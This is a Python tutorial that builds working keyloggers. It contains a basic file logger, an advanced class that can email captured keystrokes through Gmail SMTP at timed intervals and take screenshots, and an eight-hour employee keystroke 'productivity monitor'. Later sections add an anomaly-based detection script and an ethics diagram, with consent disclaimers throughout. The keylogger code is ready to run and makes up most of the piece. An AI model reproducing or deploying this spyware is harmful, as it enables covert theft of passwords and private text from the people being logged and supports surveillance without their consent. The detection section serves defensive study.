Building a Keylogger

⚠️ This article is for educational purposes only. Using keyloggers without consent is illegal and unethical. Always obtain proper authorization before monitoring any system or device. Misuse of this information may result in severe legal consequences.

A keylogger is a program that records the keystrokes a user makes. While it has legitimate uses such as parental control or employee monitoring, it’s often associated with malicious intent. This tutorial shows how keyloggers work in Python for educational purposes, then covers how they can be detected and the ethical considerations around them.

Basic Keylogger

Let’s start with a simple keylogger that captures keystrokes and saves them to a file:

simple_keylogger.py
from pynput import keyboard
import numpy as np

def on_press(key):
    try:
        with open("keylog.txt", "ab") as f:
            np.save(f, np.array([key.char]))
    except AttributeError:
        with open("keylog.txt", "ab") as f:
            np.save(f, np.array([str(key)]))

def on_release(key):
    if key == keyboard.Key.esc:
        return False

with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

This script uses the pynput library to listen for keystrokes and numpy for efficient data handling. When a key is pressed, it’s written to a file named keylog.txt using NumPy’s binary format. The program stops when the ‘Esc’ key is pressed.

Advanced Keylogger

Now let’s create a more advanced keylogger with additional features:

advanced_keylogger.py
import keyboard
import smtplib
from threading import Timer
from datetime import datetime
import numpy as np
import pyautogui
from PIL import Image
import io

SEND_REPORT_EVERY = 60 # in seconds
EMAIL_ADDRESS = "[email protected]"
EMAIL_PASSWORD = "your_email_password"

class Keylogger:
    def __init__(self, interval, report_method="email"):
        self.interval = interval
        self.report_method = report_method
        self.log = np.array([], dtype=str)
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()

    def callback(self, event):
        name = event.name
        if len(name) > 1:
            if name == "space":
                name = " "
            elif name == "enter":
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log = np.append(self.log, name)

    def update_filename(self):
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"

    def report_to_file(self):
        np.save(f"{self.filename}.npy", self.log)
        print(f"[+] Saved {self.filename}.npy")

    def sendmail(self, email, password, message):
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()

    def report(self):
        if self.log.size > 0:
            self.end_dt = datetime.now()
            self.update_filename()
            if self.report_method == "email":
                self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log.tostring())
            elif self.report_method == "file":
                self.report_to_file()
            self.start_dt = datetime.now()
        self.log = np.array([], dtype=str)
        timer = Timer(interval=self.interval, function=self.report)
        timer.daemon = True
        timer.start()

    def screenshot(self):
        screenshot = pyautogui.screenshot()
        bytes_io = io.BytesIO()
        screenshot.save(bytes_io, format='PNG')
        return bytes_io.getvalue()

    def start(self):
        self.start_dt = datetime.now()
        keyboard.on_release(callback=self.callback)
        self.report()
        keyboard.wait()

if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
    keylogger.start()

This advanced keylogger includes features like:

  1. Periodic reporting
  2. Email functionality (be cautious with email credentials)
  3. Improved key logging (handling special keys)
  4. File naming based on timestamp
  5. Efficient data storage using NumPy arrays
  6. Screenshot capability using PyAutoGUI

Real-life Example: Employee Productivity Monitoring

Here’s a real-life example of using a keylogger for employee productivity monitoring:

productivity_monitor.py
import keyboard
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt

class ProductivityMonitor:
    def __init__(self, monitoring_period=timedelta(hours=8)):
        self.start_time = datetime.now()
        self.end_time = self.start_time + monitoring_period
        self.keystrokes = np.array([], dtype=str)
        self.timestamps = np.array([], dtype=datetime)

    def callback(self, event):
        current_time = datetime.now()
        if current_time > self.end_time:
            return False
        self.keystrokes = np.append(self.keystrokes, event.name)
        self.timestamps = np.append(self.timestamps, current_time)

    def analyze_productivity(self):
        time_diff = np.diff(self.timestamps)
        activity_periods = time_diff[time_diff < timedelta(minutes=5)]

        total_active_time = np.sum(activity_periods)
        total_monitored_time = self.end_time - self.start_time
        productivity_percentage = (total_active_time / total_monitored_time) * 100

        return productivity_percentage

    def plot_activity(self):
        hour_counts = np.zeros(24)
        for timestamp in self.timestamps:
            hour_counts[timestamp.hour] += 1

        plt.bar(range(24), hour_counts)
        plt.xlabel('Hour of the Day')
        plt.ylabel('Number of Keystrokes')
        plt.title('Keystroke Activity Throughout the Day')
        plt.savefig('activity_plot.png')

    def start(self):
        keyboard.on_release(callback=self.callback)
        keyboard.wait()

        productivity = self.analyze_productivity()
        print(f"Productivity: {productivity:.2f}%")
        self.plot_activity()

if __name__ == "__main__":
    monitor = ProductivityMonitor()
    monitor.start()

This script monitors keystrokes over a specified period (default 8 hours) and provides a simple productivity analysis based on typing activity. It calculates the percentage of time the user was active and generates a plot of keystroke activity throughout the day.

Detailed explanation:

  1. The ProductivityMonitor class is initialized with a monitoring period.
  2. The callback method is triggered on each key release, recording the keystroke and timestamp.
  3. analyze_productivity calculates the percentage of time the user was active, considering gaps of less than 5 minutes between keystrokes as continuous activity.
  4. plot_activity creates a bar chart showing keystroke frequency for each hour of the day.
  5. The start method begins the monitoring process and outputs the results.
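
The active-time arithmetic in step 3 can be checked in isolation on synthetic timestamps, with no keyboard hook involved. The sketch below is a minimal illustration using only the standard library; the function name `active_fraction` and the `max_gap` parameter are hypothetical and do not appear in the script above. It sums the gaps between consecutive timestamps that are shorter than five minutes and divides by the monitored period. Starting the sum from `timedelta()` keeps the result a `timedelta` even when there are no gaps to add.

```python
from datetime import datetime, timedelta


def active_fraction(timestamps, period, max_gap=timedelta(minutes=5)):
    """Fraction of `period` covered by gaps between consecutive events shorter than `max_gap`."""
    ordered = sorted(timestamps)
    # Pair each timestamp with the next one and measure the gap between them.
    gaps = (later - earlier for earlier, later in zip(ordered, ordered[1:]))
    # Only short gaps count as continuous activity; long gaps are treated as idle time.
    active = sum((gap for gap in gaps if gap < max_gap), timedelta())
    return active / period


start = datetime(2024, 1, 1, 9, 0, 0)
# Synthetic events: three within two minutes, a 30-minute pause, then two more.
events = [start + timedelta(minutes=m) for m in (0, 1, 2, 32, 33)]
fraction = active_fraction(events, period=timedelta(hours=1))
print(f"Active: {fraction * 100:.2f}%")
```

Here the gaps are 1, 1, 30, and 1 minutes, so only three minutes of the hour count as active. The example also shows the limits of the metric: it measures the spacing of input events, not the quality or nature of the work.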

Keylogger Detection

Understanding how keyloggers can be detected is crucial. Here’s a heuristic detection script that flags processes with unusual resource usage:

keylogger_detector.py
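import time

import numpy as np
import psutil
from sklearn.ensemble import IsolationForest

def get_process_features(proc):
    """Return six numeric features for a process, or zeros if it cannot be read."""
    try:
        # Process.connections() was renamed net_connections() in psutil 6.0.
        get_connections = getattr(proc, "net_connections", None) or proc.connections
        io = proc.io_counters()  # not implemented on every platform
        return np.array([
            proc.cpu_percent(),  # measured since the priming call below
            proc.memory_percent(),
            len(get_connections()),
            len(proc.open_files()),
            io.read_count,
            io.write_count,
        ], dtype=float)
    except (psutil.Error, AttributeError, NotImplementedError):
        return np.zeros(6)

def check_for_keyloggers():
    # Cache name and exe up front; fields that cannot be read are set to None.
    processes = list(psutil.process_iter(['name', 'exe']))

    # The first cpu_percent() call always returns 0.0, so prime it and wait.
    for proc in processes:
        try:
            proc.cpu_percent()
        except psutil.Error:
            pass
    time.sleep(1)

    features = np.array([get_process_features(proc) for proc in processes])

    # contamination=0.1 labels roughly 10% of processes as outliers on any machine.
    clf = IsolationForest(contamination=0.1, random_state=42)
    preds = clf.fit_predict(features)

    return [proc for proc, pred in zip(processes, preds) if pred == -1]

if __name__ == "__main__":
    suspicious = check_for_keyloggers()
    if suspicious:
        print("Unusual processes (candidates for manual review, not confirmed keyloggers):")
        for proc in suspicious:
            print(f"Name: {proc.info['name']}, PID: {proc.pid}, Path: {proc.info['exe']}")
    else:
        print("No suspicious processes detected.")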

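This script uses an Isolation Forest to flag processes whose resource usage is statistically unusual compared with the other processes on the same machine. The features are CPU usage, memory usage, the number of network connections, the number of open files, and I/O read and write counts. An anomaly is not proof of a keylogger: with contamination=0.1 the model labels roughly 10% of processes as outliers on any system, and a lightweight keylogger may look entirely ordinary on these features. Treat the output as a list of candidates for manual review.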
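
To see how the Isolation Forest labelling behaves, it can be run on synthetic data instead of live processes. The sketch below is an illustration under stated assumptions: the feature values are random numbers invented for the demonstration, not measurements, and the layout (99 similar rows plus one extreme row) is chosen only to make the effect visible. It uses the same `IsolationForest` settings as the script above.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)

# 99 synthetic "ordinary" rows: six features clustered around the same values.
ordinary = rng.normal(loc=10.0, scale=1.0, size=(99, 6))
# One synthetic row with far larger values than the rest.
unusual = np.full((1, 6), 100.0)
features = np.vstack([ordinary, unusual])

clf = IsolationForest(contamination=0.1, random_state=42)
preds = clf.fit_predict(features)  # -1 marks an outlier, 1 an inlier

flagged = np.flatnonzero(preds == -1)
print(f"Flagged {flagged.size} of {len(features)} rows")
print("Synthetic outlier flagged:", 99 in flagged)
```

The extreme row is flagged, but so are several ordinary rows, because the `contamination` parameter fixes the share of rows labelled as outliers in advance. The same effect explains why the detector reports some processes on a clean machine.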

Ethical Considerations

The use of keyloggers raises significant ethical and legal concerns. Here’s a diagram illustrating the ethical considerations:

graph TD
    A[Keylogger Usage] --> B{Ethical Considerations}
    B --> C[Privacy]
    B --> D[Consent]
    B --> E[Data Security]
    B --> F[Legal Implications]
    C --> G[Invasion of Personal Space]
    D --> H[Informed Agreement]
    E --> I[Protecting Sensitive Information]
    F --> J[Compliance with Laws]
    B --> K[Transparency]
    K --> L[Clear Communication]
    B --> M[Data Minimization]
    M --> N[Collect Only Necessary Data]
    B --> O[Purpose Limitation]
    O --> P[Use Data Only for Intended Purpose]

Always ensure you have proper authorization and comply with all applicable laws and regulations before using or developing keylogger software.

Conclusion

Keyloggers are powerful tools that can be used for both beneficial and harmful purposes. As developers, it’s crucial to understand how they work, how to detect them, and the ethical implications of their use. Always prioritize privacy, security, and legal compliance in your development practices.

Remember, the techniques discussed in this article should only be used for educational purposes or with explicit consent in controlled environments.